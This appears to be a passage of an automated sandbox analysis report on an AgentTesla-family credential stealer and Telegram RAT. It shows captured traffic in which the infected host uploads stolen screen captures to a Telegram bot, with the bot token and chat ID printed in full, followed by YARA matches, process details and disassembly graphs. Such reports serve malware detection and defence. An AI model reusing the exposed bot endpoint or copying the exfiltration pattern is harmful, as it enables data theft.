                                                2024-05-17 23:39:41 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:39:41 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:39:41 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:39:41 UTC1414OUTData Raw: 00 10 f4 a0 0f 9f 68 a2 8a d4 c0 db d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 a3 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b1 29 28 b0 5c 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da
                                                Data Ascii: h<I=.m`rS$?`;ucO)(\(`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;
                                                2024-05-17 23:39:41 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 64 39 66 39 65 30 37 64 35 38 61 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dccd9f9e07d58a--
                                                2024-05-17 23:39:41 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:39:42 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:39:41 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17192.168.2.449756149.154.167.220443
                                                TimestampBytes transferredDirectionData
                                                2024-05-17 23:40:01 UTC262OUTPOST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc76a92388cec9
                                                Host: api.telegram.org
                                                Content-Length: 67000
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-17 23:40:02 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 36 61 39 32 33 38 38 63 65 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 36 35 31 32 38 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 36 61 39 32 33 38 38 63 65 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 31 37 2f 32 30 32 34 20 31 39 3a 33 39 3a 35 39 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc76a92388cec9Content-Disposition: form-data; name="chat_id"1165128482-----------------------------8dc76a92388cec9Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/17/2024 19:39:59User
                                                2024-05-17 23:40:02 UTC16355OUTData Raw: f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 5b cd 07 fa d8 d9 41 e8 48 e0 fd 0d 45 5b 26 9e c6 2d 35 a3 0a 4a 5a 28 10
                                                Data Ascii: br$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T[AHE[&-5JZ(
                                                2024-05-17 23:40:02 UTC16355OUTData Raw: 5a bd 8e fa f2 e1 21 b2 92 79 0e d4 52 39 c6 7b 8f 4a a1 7b aa 59 4f a5 5c a2 5c a3 3b 46 40 1c 82 78 f7 ae 50 4f 32 c2 d0 89 5b ca 6e a9 9e 0f e1 51 d5 c3 02 93 bb 63 a9 99 ca 4a d1 8e 96 0a 28 a2 bd 03 c9 0a 28 a2 80 12 ba 3f 0a 4f 0c 31 dd 79 b3 47 1e 4a e3 7b 01 9e be b5 ce 51 58 d7 a5 ed 61 cb 7b 1d 38 6a fe c2 a7 3d ae 7a 17 db ec ff 00 e7 f2 0f fb fa bf e3 49 f6 fb 2f f9 fc b7 ff 00 bf ab fe 35 e7 d4 57 17 f6 7f f7 bf 0f f8 27 a3 fd ad fd cf c7 fe 01 e8 3f 6f b2 ff 00 9f cb 7f fb fa bf e3 5c 7e bf 24 72 eb 13 bc 4e ae 87 6e 19 4e 41 f9 47 7a ce a2 b6 a1 84 f6 53 e6 e6 b9 cf 89 c7 fb 78 72 72 db e7 ff 00 00 28 a2 8a ed 3c e0 a2 8a 28 03 4b c3 9f f2 1d b6 ff 00 81 7f e8 26 bb aa f3 3a 4c 0f 4a e0 c4 61 25 56 7c c9 9e a6 17 1d 1a 14 f9 1a b9 e9 b4 57
                                                Data Ascii: Z!yR9{J{YO\\;F@xPO2[nQcJ((?O1yGJ{QXa{8j=zI/5W'?o\~$rNnNAGzSxrr(<(K&:LJa%V|W
                                                2024-05-17 23:40:02 UTC16355OUTData Raw: 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b 7d ac e7 ec fe 5e ec 6c 5f f9 e9 c6 3f 5a e4 a8 e5 2a 6f 9f ba 47 7c 52 53 f7 4d ef ed 68 ff 00 e7 be 9f ff 00 81 9f fd 8d 62 78 b3 fe 42 b1 ff 00 d7 05 ff 00 d0 9a b4 b7 6a 5f dc d6 3f f2 4e b3 7c 59 ff 00 21 58 ff 00 eb 82 ff 00 e8 4d 59 61 d2 55 a3 6f 3f c8 cf 1b 7f ab 4e fe 5f 9a 31 28 a2 8a f6 4f 9a 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b
                                                Data Ascii: `yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K}^l_?Z*oG|RSMhbxBj_?N|Y!XMYaUo?N_1(O((Q@Q@E-R@EPEPEPEPEPQK
                                                2024-05-17 23:40:02 UTC15447OUTData Raw: 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 c2 92 96 92 80 0a 4a 5a 4a 06 14 51 45 03 0a 4a 28 a0 02 92 96 92 81 85 14 51 40 09 45 14 50 31 0d 14 51 40 05 25 2d 25 03 0a 4a 5a 4a 00 29 29 68 a0 a1 28 a2 92 80 42 d2 51 45 00 21 a2 8a 28 18 52 52 d2 50 30 a4 a2 8a 00 4a 29 69 28 18 52 52 d2 50 30 a4 a2 8a 00 29 29 68 a0 62 51 45 14 0c 29 28 a4 a0 05 a4 a2 8a 06 1c 51 49 45 00 14 51 45 03 12 8a 28 a0 62 51 45 14 00 51 45 25 31 87 f3 a2 8f ca 83 48 62 1e 39 a2 8a 29 80 9f 8d 1c 51 45 03 0a 4e 29 69 38 a4 01 ef 47 d2 8a 29 80 94 be
                                                Data Ascii: (((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@JZJQEJ(Q@EP1Q@%-%JZJ))h(BQE!(RRP0J)i(RRP0))hbQE)(QIEQE(bQEQE%1Hb9)QEN)i8G)
                                                2024-05-17 23:40:02 UTC1414OUTData Raw: 00 10 f4 a0 0f 9f 68 a2 8a d4 c0 db d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 a3 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b1 29 28 b0 5c 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da
                                                Data Ascii: h<I=.m`rS$?`;ucO)(\(`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;
                                                2024-05-17 23:40:02 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 36 61 39 32 33 38 38 63 65 63 39 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc76a92388cec9--
                                                2024-05-17 23:40:02 UTC25INHTTP/1.1 100 Continue
                                                2024-05-17 23:40:02 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 17 May 2024 23:40:02 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:19:35:54
                                                Start date:17/05/2024
                                                Path:C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe"
                                                Imagebase:0xfe0000
                                                File size:249'856 bytes
                                                MD5 hash:1022EEE3D28A81920664B590983AAFAA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:13.2%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:26
                                                  Total number of Limit Nodes:2
                                                  execution_graph 28286 3210848 28288 3210849 28286->28288 28287 321091b 28288->28287 28291 3211340 28288->28291 28297 321145f 28288->28297 28293 3211356 28291->28293 28292 321145a 28292->28288 28293->28292 28294 321145f MoveFileA 28293->28294 28303 3216eaf 28293->28303 28307 3216f50 28293->28307 28294->28293 28299 3211356 28297->28299 28298 321145a 28298->28288 28299->28298 28300 3216f50 MoveFileA 28299->28300 28301 3216eaf MoveFileA 28299->28301 28302 321145f MoveFileA 28299->28302 28300->28299 28301->28299 28302->28299 28304 3216ed8 28303->28304 28305 3216f1c 28304->28305 28311 321675c 28304->28311 28305->28293 28308 3216f6f 28307->28308 28309 321675c MoveFileA 28308->28309 28310 321702a 28308->28310 28309->28310 28310->28293 28312 3217460 MoveFileA 28311->28312 28314 32174ff 28312->28314 28314->28305 28315 673e658 28316 673e69e GlobalMemoryStatusEx 28315->28316 28317 673e6ce 28316->28317

                                                  Executed Functions

                                                  Function 06730040 Relevance: 9.0, Strings: 6, Instructions: 1480COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4111250182.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6730000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                  • API String ID: 0-2331353128
                                                  • Opcode ID: 5868023746b15f5348bc5d6215c50908316c2503fed7765f977359bedf41da2f
                                                  • Instruction ID: 2a8fbdbc9100e1dc8a7525c60140417f5ed17c2158638c86df8d9bee78db68af
                                                  • Opcode Fuzzy Hash: 5868023746b15f5348bc5d6215c50908316c2503fed7765f977359bedf41da2f
                                                  • Instruction Fuzzy Hash: ECD23834E102198FDB64DF68C594AADB7B2FF89310F54C5A9D409AB265EB34ED81CB80
                                                  Function 06739700 Relevance: 8.0, Strings: 6, Instructions: 467COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 578 6739700-6739722 579 6739724-6739727 578->579 580 6739737-673973a 579->580 581 6739729-6739732 579->581 582 6739744-6739747 580->582 583 673973c-673973f 580->583 581->580 584 6739769-673976c 582->584 585 6739749-6739764 582->585 583->582 588 6739774-6739777 584->588 589 673976e-673976f 584->589 585->584 590 67397b6-67397b9 588->590 591 6739779-673978e 588->591 589->588 592 67397bb-67397c4 590->592 593 67397cf-67397d2 590->593 600 6739aa7-6739ade 591->600 605 6739794-67397b1 591->605 595 6739a10-6739a19 592->595 596 67397ca 592->596 597 67397d4-67397d8 593->597 598 67397f9-67397fc 593->598 595->600 601 6739a1f-6739a26 595->601 596->593 597->600 602 67397de-67397ee 597->602 603 6739809-673980c 598->603 604 67397fe-6739804 598->604 625 6739ae0-6739ae3 600->625 606 6739a2b-6739a2e 601->606 621 67397f4 602->621 622 673995c-6739960 602->622 607 6739812-6739815 603->607 608 6739949-673994c 603->608 604->603 605->590 610 6739a30-6739a39 606->610 611 6739a3e-6739a41 606->611 616 6739817-6739820 607->616 617 6739825-6739828 607->617 614 6739952 608->614 615 6739a79-6739a7c 608->615 610->611 623 6739a43-6739a47 611->623 624 6739a54-6739a57 611->624 626 6739957-673995a 614->626 615->600 620 6739a7e-6739a85 615->620 616->617 618 673982a-6739833 617->618 619 6739838-673983b 617->619 618->619 627 6739852-6739855 619->627 628 673983d-6739841 619->628 629 6739a8a-6739a8c 620->629 621->598 622->600 634 6739966-6739976 622->634 623->600 630 6739a49-6739a4f 623->630 635 6739a6b-6739a6e 624->635 636 6739a59-6739a60 624->636 631 6739b06-6739b09 625->631 632 6739ae5-6739b01 625->632 626->622 633 6739981-6739984 626->633 644 6739893-6739896 627->644 645 6739857-673986c 627->645 628->600 641 6739847-673984d 628->641 642 6739a93-6739a96 629->642 643 6739a8e 629->643 630->624 638 6739d75-6739d77 631->638 639 6739b0f-6739b37 631->639 632->631 633->592 640 673998a-673998d 633->640 652 6739898-673989c 634->652 665 673997c 634->665 635->583 637 6739a74-6739a77 635->637 636->618 646 6739a66 636->646 637->615 637->629 647 6739d79 638->647 648 6739d7e-6739d81 638->648 689 6739b41-6739b85 639->689 690 6739b39-6739b3c 639->690 649 67399a4-67399a7 640->649 650 673998f-6739993 640->650 641->627 642->579 651 6739a9c-6739aa6 642->651 643->642 644->652 653 67398bd-67398c0 644->653 645->600 668 6739872-673988e 645->668 646->635 647->648 648->625 656 6739d87-6739d90 648->656 661 6739a0b-6739a0e 649->661 662 67399a9-6739a06 call 6734660 649->662 650->600 660 6739999-673999f 650->660 652->600 664 67398a2-67398b2 652->664 657 67398e3-67398e6 653->657 658 67398c2-67398de 653->658 666 67398e8-67398ea 657->666 667 67398ed-67398f0 657->667 658->657 660->649 661->595 661->606 662->661 664->583 676 67398b8 664->676 665->633 666->667 673 6739902-6739905 667->673 674 67398f2 667->674 668->644 679 6739907-6739913 673->679 680 6739918-673991b 673->680 685 67398fa-67398fd 674->685 676->653 679->680 680->583 681 6739921-6739924 680->681 687 6739926-6739929 681->687 688 673992e-6739931 681->688 685->673 687->688 691 6739933-6739938 688->691 692 673993b-673993e 688->692 700 6739b8b-6739b94 689->700 701 6739d6a-6739d74 689->701 690->656 691->692 692->583 694 6739944-6739947 692->694 694->608 694->626 703 6739d60-6739d65 700->703 704 6739b9a-6739c06 call 6734660 700->704 703->701 713 6739d00-6739d15 704->713 714 6739c0c-6739c11 704->714 713->703 716 6739c13-6739c19 714->716 717 6739c2d 714->717 719 6739c1b-6739c1d 716->719 720 6739c1f-6739c21 716->720 718 6739c2f-6739c35 717->718 721 6739c37-6739c3d 718->721 722 6739c4a-6739c57 718->722 723 6739c2b 719->723 720->723 724 6739c43 721->724 725 6739ceb-6739cfa 721->725 730 6739c59-6739c5f 722->730 731 6739c6f-6739c7c 722->731 723->718 724->722 726 6739cb2-6739cbf 724->726 727 6739c7e-6739c8b 724->727 725->713 725->714 738 6739cc1-6739cc7 726->738 739 6739cd7-6739ce4 726->739 736 6739ca3-6739cb0 727->736 737 6739c8d-6739c93 727->737 733 6739c63-6739c65 730->733 734 6739c61 730->734 731->725 733->731 734->731 736->725 741 6739c97-6739c99 737->741 742 6739c95 737->742 743 6739ccb-6739ccd 738->743 744 6739cc9 738->744 739->725 741->736 742->736 743->739 744->739
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4111250182.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6730000_1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                  • API String ID: 0-2331353128
                                                  • Opcode ID: 44b6449df751eaff2890638c9bc6d227384aee6d2af9fb783d27592473b7d206
                                                  • Instruction ID: 756100d8c5d1d7a1efe957ddbcd94daff0116fac0d86b6ff7189c41a5e5fd9d4
                                                  • Opcode Fuzzy Hash: 44b6449df751eaff2890638c9bc6d227384aee6d2af9fb783d27592473b7d206
                                                  • Instruction Fuzzy Hash: 89026070E102298FDF64CF68D4806AEB7F2FB85310F24856AD605DB292EB75DC85CB91
                                                  Function 0673C450 Relevance: 4.3, Strings: 3, Instructions: 564COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1073 673c450-673c469 1074 673c46b-673c46e 1073->1074 1075 673c470 1074->1075 1076 673c47e-673c481 1074->1076 1079 673c476-673c479 1075->1079 1077 673c483-673c49f 1076->1077 1078 673c4a4-673c4a7 1076->1078 1077->1078 1080 673c6da-673c6e3 1078->1080 1081 673c4ad-673c4b0 1078->1081 1079->1076 1082 673c6e9-673c6f3 1080->1082 1083 673c4bf-673c4c8 1080->1083 1085 673c4b2-673c4b7 1081->1085 1086 673c4ba-673c4bd 1081->1086 1088 673c6f4-673c72b 1083->1088 1089 673c4ce-673c4d5 1083->1089 1085->1086 1086->1083 1087 673c4da-673c4dc 1086->1087 1090 673c4e3-673c4e6 1087->1090 1091 673c4de 1087->1091 1095 673c72d-673c730 1088->1095 1089->1087 1090->1074 1093 673c4e8-673c59c 1090->1093 1091->1090 1212 673c5a2-673c5ad 1093->1212 1213 673c698-673c6bc 1093->1213 1097 673c732-673c741 1095->1097 1098 673c74c-673c74f 1095->1098 1110 673c747 1097->1110 1111 673c7cb-673c7ce 1097->1111 1099 673c751-673c777 1098->1099 1100 673c77c-673c77f 1098->1100 1099->1100 1102 673c781-673c78a 1100->1102 1103 673c79c-673c79f 1100->1103 1106 673c790-673c797 1102->1106 1107 673c929-673c95e 1102->1107 1108 673c836-673c83f 1103->1108 1109 673c7a5-673c7a8 1103->1109 1106->1103 1131 673c960-673c963 1107->1131 1108->1102 1113 673c845 1108->1113 1115 673c7b2-673c7b5 1109->1115 1116 673c7aa-673c7af 1109->1116 1110->1098 1112 673c7d3-673c7d6 1111->1112 1118 673c7e2-673c7e5 1112->1118 1119 673c7d8-673c7db 1112->1119 1120 673c84a-673c84d 1113->1120 1122 673c7b7-673c7c1 1115->1122 1123 673c7c6-673c7c9 1115->1123 1116->1115 1128 673c7e7-673c800 1118->1128 1129 673c805-673c808 1118->1129 1124 673c80a-673c80d 1119->1124 1125 673c7dd 1119->1125 1126 673c854-673c857 1120->1126 1127 673c84f-673c851 1120->1127 1122->1123 1123->1111 1123->1112 1124->1107 1136 673c813-673c817 1124->1136 1125->1118 1133 673c881-673c884 1126->1133 1134 673c859-673c87c 1126->1134 1127->1126 1128->1129 1129->1124 1135 673c81c-673c81f 1129->1135 1137 673c986-673c989 1131->1137 1138 673c965-673c981 1131->1138 1144 673c8a7-673c8aa 1133->1144 1145 673c886-673c8a2 1133->1145 1134->1133 1135->1119 1146 673c821-673c824 1135->1146 1136->1135 1140 673c98b-673c9a4 1137->1140 1141 673c9a9-673c9ac 1137->1141 